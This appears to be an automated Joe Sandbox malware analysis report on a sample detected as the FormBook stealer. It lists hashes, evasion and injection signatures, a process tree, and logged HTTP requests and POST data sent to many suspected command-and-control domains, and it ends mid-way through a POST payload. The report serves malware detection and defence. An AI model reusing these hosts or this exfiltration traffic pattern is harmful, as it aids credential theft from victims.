Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO2412010.exe

Overview

General Information

Sample name:PO2412010.exe
Analysis ID:1572437
MD5:60abe4a88d6c409a3a4770cef13c0222
SHA1:ccdd09a372d79f68b96af483caf946fa9b552c56
SHA256:cd676542bbeac4ff5dea88783c4e93b89971bdf60eaa04128f1d36078a4c2ad4
Tags:exeuser-James_inthe_box
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • PO2412010.exe (PID: 7300 cmdline: "C:\Users\user\Desktop\PO2412010.exe" MD5: 60ABE4A88D6C409A3A4770CEF13C0222)
    • PO2412010.exe (PID: 7520 cmdline: "C:\Users\user\Desktop\PO2412010.exe" MD5: 60ABE4A88D6C409A3A4770CEF13C0222)
      • duvyEsVvTpq.exe (PID: 6740 cmdline: "C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • isoburn.exe (PID: 7836 cmdline: "C:\Windows\SysWOW64\isoburn.exe" MD5: BF19DD525C7D23CAFC086E9CCB9C06C6)
          • duvyEsVvTpq.exe (PID: 5804 cmdline: "C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 8080 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.1811060846.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000006.00000002.3828928814.0000000002620000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.3835997745.00000000043F0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000003.00000002.1811863251.0000000001980000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000006.00000002.3835510963.00000000041B0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            3.2.PO2412010.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              3.2.PO2412010.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                No Suricata rule has matched

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: PO2412010.exeReversingLabs: Detection: 36%
                Yara detected FormBook
                Source: Yara matchFile source: 3.2.PO2412010.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.PO2412010.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.1811060846.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3828928814.0000000002620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3835997745.00000000043F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1811863251.0000000001980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3835510963.00000000041B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3838073640.00000000058D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3835472145.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1813283788.0000000001F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: PO2412010.exeJoe Sandbox ML: detected
                Source: PO2412010.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: PO2412010.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: isoburn.pdb source: PO2412010.exe, 00000003.00000002.1811368240.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, duvyEsVvTpq.exe, 00000005.00000002.3832925744.0000000001238000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: isoburn.pdbGCTL source: PO2412010.exe, 00000003.00000002.1811368240.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, duvyEsVvTpq.exe, 00000005.00000002.3832925744.0000000001238000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: bsOm.pdb source: PO2412010.exe
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: duvyEsVvTpq.exe, 00000005.00000002.3828968792.00000000003AE000.00000002.00000001.01000000.0000000D.sdmp, duvyEsVvTpq.exe, 00000009.00000000.1877721836.00000000003AE000.00000002.00000001.01000000.0000000D.sdmp
                Source: Binary string: wntdll.pdbUGP source: PO2412010.exe, 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000006.00000003.1813841964.00000000043C5000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.3836401832.000000000470E000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000006.00000003.1811319300.0000000004217000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.3836401832.0000000004570000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: PO2412010.exe, PO2412010.exe, 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, isoburn.exe, 00000006.00000003.1813841964.00000000043C5000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.3836401832.000000000470E000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000006.00000003.1811319300.0000000004217000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.3836401832.0000000004570000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: bsOm.pdbSHA256y ] source: PO2412010.exe
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0263C4E0 FindFirstFileW,FindNextFileW,FindClose,6_2_0263C4E0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4x nop then xor eax, eax6_2_02629E40
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4x nop then mov ebx, 00000004h6_2_048C04F8

                Networking

                barindex
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.cyperla.xyz
                Source: DNS query: www.070002018.xyz
                Source: Joe Sandbox ViewIP Address: 101.35.209.183 101.35.209.183
                Source: Joe Sandbox ViewIP Address: 146.88.233.115 146.88.233.115
                Source: Joe Sandbox ViewIP Address: 161.97.142.144 161.97.142.144
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 10 Dec 2024 14:15:50 GMTserver: Apacheset-cookie: __tad=1733840150.1472258; expires=Fri, 08-Dec-2034 14:15:50 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 51 ac 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 12 5b f2 24 3a 69 50 e4 bf 8f 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 d9 c9 aa a9 33 42 d5 14 f9 29 12 15 5e 39 dd 13 d0 a1 47 11 13 de 53 be 91 3b 79 8a c6 e0 9d 12 71 be f1 79 ad cd 1a 5d ef b4 a1 5c eb 1a b3 4e 9b 6c e3 e3 b2 c8 4f d8 d7 52 95 d1 4e 3a 70 58 69 87 8a 7e b4 da 6c 41 40 d2 10 f5 cb 3c df ef f7 d9 b3 ba fc da 0e d7 f9 fb 64 15 45 79 0e b7 48 20 81 74 87 76 20 b0 35 5c 2d 16 d0 69 e5 ac 47 65 4d e5 81 2c e0 3d aa 81 90 81 8f 25 40 d7 40 0d c2 0b e5 d0 3b db 69 cf 31 a9 5b 0f b5 75 e0 6d 87 4c 91 de 9a a8 1e 8c 22 6d 0d 1f b7 ed 9d 54 db 9b 29 55 3a 87 87 68 b6 d7 a6 b2 fb ac b5 4a 06 54 e6 b0 6f a5 c2 f4 37 4f e7 49 dd 8b 8b 77 c9 7c 15 1d a3 88 dc 21 30 59 a5 27 70 95 fb 36 99 10 e0 91 a6 4d fa 67 b5 37 c1 20 f3 67 a1 61 75 ff 75 d2 2c e0 e3 b3 93 cf b7 ac 43 56 e9 43 67 8d 26 cb a1 f5 32 c8 f6 78 0c cc 27 56 34 9b 65 dc 04 93 d6 3d 88 92 b3 65 6b 64 3b f3 a7 38 bf cc 1c fa a1 a5 70 fe 00 61 3f 15 76 41 67 b0 93 9c 9f 10 d9 4e fb 50 ec 53 b5 1a 61 aa 45 f9 68 29 7d 76 37 3f 9d fe 5f bb 42 99 91 10 74 1f 81 b1 aa 49 d1 b9 b1 e3 7f 7f 87 b1 ab 2f 47 8e 0e 3c c5 70 67 2b 6e 34 04 ec da d9 c1 54 cb b3 cb c5 a5 ba ba 86 23 30 7a 04 31 6d ba 0c 23 fa 6e ad 6c 6b 9d 88 cf ea 71 c5 10 26 96 b7 8b 71 f1 bc 16 95 de c1 c8 15 49 a5 3d ab 3f 2c c1 58 83 ab a4 2c 24 34 0e 6b f1 cf f9 0d 93 70 95 94 1f 5a ad b6 d0 a0 c3 71 50 0d a1 2b 72 c9 17 87 f3 73 15 63 27 37 45 87 c4 69 39 e1 05 fe 1c f4 4e c4 5c 81 3b df c4 c0 03 44 4c 14 f1 62 05 df 6f be 88 d7 aa be 0d f7 f2 29 31 3b 0f 96 c7 0e 84 bf c2 2f 48 65 37 98 1c 04 00 00 Data Ascii: TMo0=pvNQ;a*[$:iPrm:]lQeb3B)^9GS;yqy]\NlORN:pXi~lA@<dEyH tv 5\-iGeM,=%@@;i1[umL"mT)U:hJTo7OIw|!0Y'p6Mg7 gauu,CVCg&2x'V4e=ekd;8pa?vAgNPSaEh)}v7?_BtI/G<pg+n4T#0z1m#nlkq&qI=?,X,$4kpZqP+rsc'7Ei9N\;DLbo)1;/He7
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 10 Dec 2024 14:15:52 GMTserver: Apacheset-cookie: __tad=1733840152.4262799; expires=Fri, 08-Dec-2034 14:15:52 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 51 ac 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 12 5b f2 24 3a 69 50 e4 bf 8f 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 d9 c9 aa a9 33 42 d5 14 f9 29 12 15 5e 39 dd 13 d0 a1 47 11 13 de 53 be 91 3b 79 8a c6 e0 9d 12 71 be f1 79 ad cd 1a 5d ef b4 a1 5c eb 1a b3 4e 9b 6c e3 e3 b2 c8 4f d8 d7 52 95 d1 4e 3a 70 58 69 87 8a 7e b4 da 6c 41 40 d2 10 f5 cb 3c df ef f7 d9 b3 ba fc da 0e d7 f9 fb 64 15 45 79 0e b7 48 20 81 74 87 76 20 b0 35 5c 2d 16 d0 69 e5 ac 47 65 4d e5 81 2c e0 3d aa 81 90 81 8f 25 40 d7 40 0d c2 0b e5 d0 3b db 69 cf 31 a9 5b 0f b5 75 e0 6d 87 4c 91 de 9a a8 1e 8c 22 6d 0d 1f b7 ed 9d 54 db 9b 29 55 3a 87 87 68 b6 d7 a6 b2 fb ac b5 4a 06 54 e6 b0 6f a5 c2 f4 37 4f e7 49 dd 8b 8b 77 c9 7c 15 1d a3 88 dc 21 30 59 a5 27 70 95 fb 36 99 10 e0 91 a6 4d fa 67 b5 37 c1 20 f3 67 a1 61 75 ff 75 d2 2c e0 e3 b3 93 cf b7 ac 43 56 e9 43 67 8d 26 cb a1 f5 32 c8 f6 78 0c cc 27 56 34 9b 65 dc 04 93 d6 3d 88 92 b3 65 6b 64 3b f3 a7 38 bf cc 1c fa a1 a5 70 fe 00 61 3f 15 76 41 67 b0 93 9c 9f 10 d9 4e fb 50 ec 53 b5 1a 61 aa 45 f9 68 29 7d 76 37 3f 9d fe 5f bb 42 99 91 10 74 1f 81 b1 aa 49 d1 b9 b1 e3 7f 7f 87 b1 ab 2f 47 8e 0e 3c c5 70 67 2b 6e 34 04 ec da d9 c1 54 cb b3 cb c5 a5 ba ba 86 23 30 7a 04 31 6d ba 0c 23 fa 6e ad 6c 6b 9d 88 cf ea 71 c5 10 26 96 b7 8b 71 f1 bc 16 95 de c1 c8 15 49 a5 3d ab 3f 2c c1 58 83 ab a4 2c 24 34 0e 6b f1 cf f9 0d 93 70 95 94 1f 5a ad b6 d0 a0 c3 71 50 0d a1 2b 72 c9 17 87 f3 73 15 63 27 37 45 87 c4 69 39 e1 05 fe 1c f4 4e c4 5c 81 3b df c4 c0 03 44 4c 14 f1 62 05 df 6f be 88 d7 aa be 0d f7 f2 29 31 3b 0f 96 c7 0e 84 bf c2 2f 48 65 37 98 1c 04 00 00 Data Ascii: TMo0=pvNQ;a*[$:iPrm:]lQeb3B)^9GS;yqy]\NlORN:pXi~lA@<dEyH tv 5\-iGeM,=%@@;i1[umL"mT)U:hJTo7OIw|!0Y'p6Mg7 gauu,CVCg&2x'V4e=ekd;8pa?vAgNPSaEh)}v7?_BtI/G<pg+n4T#0z1m#nlkq&qI=?,X,$4kpZqP+rsc'7Ei9N\;DLbo)1;/He7
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 10 Dec 2024 14:15:55 GMTserver: Apacheset-cookie: __tad=1733840155.5395960; expires=Fri, 08-Dec-2034 14:15:55 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 51 ac 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 12 5b f2 24 3a 69 50 e4 bf 8f 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 d9 c9 aa a9 33 42 d5 14 f9 29 12 15 5e 39 dd 13 d0 a1 47 11 13 de 53 be 91 3b 79 8a c6 e0 9d 12 71 be f1 79 ad cd 1a 5d ef b4 a1 5c eb 1a b3 4e 9b 6c e3 e3 b2 c8 4f d8 d7 52 95 d1 4e 3a 70 58 69 87 8a 7e b4 da 6c 41 40 d2 10 f5 cb 3c df ef f7 d9 b3 ba fc da 0e d7 f9 fb 64 15 45 79 0e b7 48 20 81 74 87 76 20 b0 35 5c 2d 16 d0 69 e5 ac 47 65 4d e5 81 2c e0 3d aa 81 90 81 8f 25 40 d7 40 0d c2 0b e5 d0 3b db 69 cf 31 a9 5b 0f b5 75 e0 6d 87 4c 91 de 9a a8 1e 8c 22 6d 0d 1f b7 ed 9d 54 db 9b 29 55 3a 87 87 68 b6 d7 a6 b2 fb ac b5 4a 06 54 e6 b0 6f a5 c2 f4 37 4f e7 49 dd 8b 8b 77 c9 7c 15 1d a3 88 dc 21 30 59 a5 27 70 95 fb 36 99 10 e0 91 a6 4d fa 67 b5 37 c1 20 f3 67 a1 61 75 ff 75 d2 2c e0 e3 b3 93 cf b7 ac 43 56 e9 43 67 8d 26 cb a1 f5 32 c8 f6 78 0c cc 27 56 34 9b 65 dc 04 93 d6 3d 88 92 b3 65 6b 64 3b f3 a7 38 bf cc 1c fa a1 a5 70 fe 00 61 3f 15 76 41 67 b0 93 9c 9f 10 d9 4e fb 50 ec 53 b5 1a 61 aa 45 f9 68 29 7d 76 37 3f 9d fe 5f bb 42 99 91 10 74 1f 81 b1 aa 49 d1 b9 b1 e3 7f 7f 87 b1 ab 2f 47 8e 0e 3c c5 70 67 2b 6e 34 04 ec da d9 c1 54 cb b3 cb c5 a5 ba ba 86 23 30 7a 04 31 6d ba 0c 23 fa 6e ad 6c 6b 9d 88 cf ea 71 c5 10 26 96 b7 8b 71 f1 bc 16 95 de c1 c8 15 49 a5 3d ab 3f 2c c1 58 83 ab a4 2c 24 34 0e 6b f1 cf f9 0d 93 70 95 94 1f 5a ad b6 d0 a0 c3 71 50 0d a1 2b 72 c9 17 87 f3 73 15 63 27 37 45 87 c4 69 39 e1 05 fe 1c f4 4e c4 5c 81 3b df c4 c0 03 44 4c 14 f1 62 05 df 6f be 88 d7 aa be 0d f7 f2 29 31 3b 0f 96 c7 0e 84 bf c2 2f 48 65 37 98 1c 04 00 00 Data Ascii: TMo0=pvNQ;a*[$:iPrm:]lQeb3B)^9GS;yqy]\NlORN:pXi~lA@<dEyH tv 5\-iGeM,=%@@;i1[umL"mT)U:hJTo7OIw|!0Y'p6Mg7 gauu,CVCg&2x'V4e=ekd;8pa?vAgNPSaEh)}v7?_BtI/G<pg+n4T#0z1m#nlkq&qI=?,X,$4kpZqP+rsc'7Ei9N\;DLbo)1;/He7
                Source: global trafficHTTP traffic detected: GET /qygv/?x2q=PNgLNtFNavTWVACj/R5fAEIERpwPFUn3Y2lvnmQ+PypmeASZv9aNxFxhHJqyS8bM8Pjr3wsa5/scE4diKg4Wx4OEfkkKpQI8CokgLA8hMMnOvrVSxnOjJsU=&Gn6D=5fNLN8qhqB3P HTTP/1.1Host: www.cyperla.xyzAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /qx5d/?x2q=IyUQrkKyuirfHSYtNcNb8FX1VMdObdd7C0LSkI7uCAGWAT/RC+PuW1l2SNatEGXPklxe1J/nxX2px2UyQ1iP4/fNUbperoympu86OQyU69q5Nwob6N2bh/8=&Gn6D=5fNLN8qhqB3P HTTP/1.1Host: www.cstrategy.onlineAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /6ou6/?Gn6D=5fNLN8qhqB3P&x2q=We72k2U8RqyHNx9c0lgrcMajP+7PydPnCau05KQMUjWmq73IzupFdRGddnmXCSRdMUrkGKdQ0AHY8jBIUc/tuAzt5NNM6PB2yOIhAl7/Lb+uHN44LWAXbfY= HTTP/1.1Host: www.madhf.techAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /v89f/?x2q=vR3kWP+v98PFeIQX6HbJh3lQDWTjSRYryWjHUGMo4+T5xi8TnNV+jgD2+4ag3QdSrCwOZVBfu0hve5I79B9khdU1gh7QaWeiWgu/JIX+7JexMxtriwWCLY0=&Gn6D=5fNLN8qhqB3P HTTP/1.1Host: www.bser101pp.buzzAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /8m07/?x2q=2dHIoPS/8uSmn0UQwBXvkZ7FsiKx9Udv3lXpG+Z7ZfR3/r1MA6yfaSEuuX1gcPtu0HplxKUHBw+SrOQKMJrrHP/N37p6QmtlKoXALFEyxzy3Eq+MEUnkUgU=&Gn6D=5fNLN8qhqB3P HTTP/1.1Host: www.goldstarfootwear.shopAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /6m2n/?x2q=Yw5byyKwEzNx0WEyNQXxwK69B8+8B5LUHYwp2f+G51jE3kEn7LG6s/p7OKNy20MANuawYrGFRZxpwvPhYVF0/9t4uQ02LXci5FVUlLJ03efKQM1irr8PMPM=&Gn6D=5fNLN8qhqB3P HTTP/1.1Host: www.070002018.xyzAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /7yhf/?x2q=OF4p1YkyIdfCe7eLhNmLS9a71obvkkx5m6SnSx71uUBEXBHxoh5TWtGHsn9J2PYNIykLYH3RiXpaFAzmPgGr5qIxSDZKvplZ+L2zC6/y242QbNTV2zLWhg0=&Gn6D=5fNLN8qhqB3P HTTP/1.1Host: www.bienmaigrir.infoAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /wu7k/?x2q=msE8We8dGqsfRntWrquh0bsz2FoIUbe83S1Gvm9i1konD6ZBc3B28v2M3s5YR0KKFS9CfgF+yd8Vab4bVKVPv+PT22eq81M1kOVVHAZEZoSUQiJLk0TbwLs=&Gn6D=5fNLN8qhqB3P HTTP/1.1Host: www.yc791022.asiaAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /ykgd/?x2q=9oLAy+SEg8JXgI2TBYJ+cgbVH4pSJ447WKSBzbS4ZtdOlYE/G55wBiI45c0M4XnEo9VWh9C7p4Et5DP8QDQ/h7/Kfsz1ox4b0pkaI3y+ymEAIYvakOAEmGE=&Gn6D=5fNLN8qhqB3P HTTP/1.1Host: www.jalan2.onlineAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /fbpt/?x2q=sHQWWiJRbY7Czg+pdBTXnWo2YpYQcCCmWGf9ZvbaXe6zmK6gq2rUy+H9V8T+CpeiS8UyZN5qWlRSJl8kNjqwsClZu7js/9F2ASp2jrUizXePexmAjexZLZ0=&Gn6D=5fNLN8qhqB3P HTTP/1.1Host: www.beyondfitness.liveAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /dm4p/?Gn6D=5fNLN8qhqB3P&x2q=nAmjXBwFyC120iWFa15+GTz1nnoe6LyW/X6vA0SQviJnmQOR7pbzII6Li/fXSuLSC3cdwp3L3c1awzkuuw4AiTCMhthfFHlaAoSHmNs0Z/b09PqcCq4Db34= HTTP/1.1Host: www.dietcoffee.onlineAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /qtfx/?x2q=KdNk/QG/ntQJ0Ylui7yy1ELkvwiUPibsxCMWqIa/89W9m0NHjjmW45E2UxezVHfL5+2nDpZVQ4VEoa9MycOLbzmLeHv/c15PEmolRusqu0oXm0K1+tUNhxI=&Gn6D=5fNLN8qhqB3P HTTP/1.1Host: www.smartcongress.netAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.cyperla.xyz
                Source: global trafficDNS traffic detected: DNS query: www.cstrategy.online
                Source: global trafficDNS traffic detected: DNS query: www.madhf.tech
                Source: global trafficDNS traffic detected: DNS query: www.bser101pp.buzz
                Source: global trafficDNS traffic detected: DNS query: www.goldstarfootwear.shop
                Source: global trafficDNS traffic detected: DNS query: www.070002018.xyz
                Source: global trafficDNS traffic detected: DNS query: www.bienmaigrir.info
                Source: global trafficDNS traffic detected: DNS query: www.yc791022.asia
                Source: global trafficDNS traffic detected: DNS query: www.jalan2.online
                Source: global trafficDNS traffic detected: DNS query: www.beyondfitness.live
                Source: global trafficDNS traffic detected: DNS query: www.dietcoffee.online
                Source: global trafficDNS traffic detected: DNS query: www.smartcongress.net
                Source: global trafficDNS traffic detected: DNS query: www.alihones.lol
                Source: unknownHTTP traffic detected: POST /qx5d/ HTTP/1.1Host: www.cstrategy.onlineAccept: */*Accept-Encoding: gzip, deflate, brAccept-Language: en-usOrigin: http://www.cstrategy.onlineContent-Length: 200Connection: closeCache-Control: no-cacheContent-Type: application/x-www-form-urlencodedReferer: http://www.cstrategy.online/qx5d/User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36Data Raw: 78 32 71 3d 46 77 38 77 6f 52 36 55 79 51 6e 46 44 78 64 31 62 75 6c 54 34 6b 37 44 56 4f 49 66 61 65 35 6a 50 48 7a 4d 77 72 6e 39 48 44 47 43 56 42 75 2b 44 35 62 70 4c 42 73 74 51 71 57 68 42 33 79 6c 68 46 4e 78 2f 49 62 6b 2f 55 44 39 38 47 73 64 52 6d 4f 76 70 4a 50 58 54 2b 46 52 70 35 69 74 6d 37 77 76 4f 46 79 46 2b 4b 2b 33 47 6a 5a 32 30 4c 6e 65 68 76 4d 6a 55 33 2f 78 44 6b 50 43 58 70 57 4d 4f 6c 30 41 75 39 49 51 45 77 61 74 64 51 79 47 65 74 52 30 4e 36 6e 63 64 46 4a 65 5a 68 52 61 53 53 67 6f 36 47 43 51 4b 68 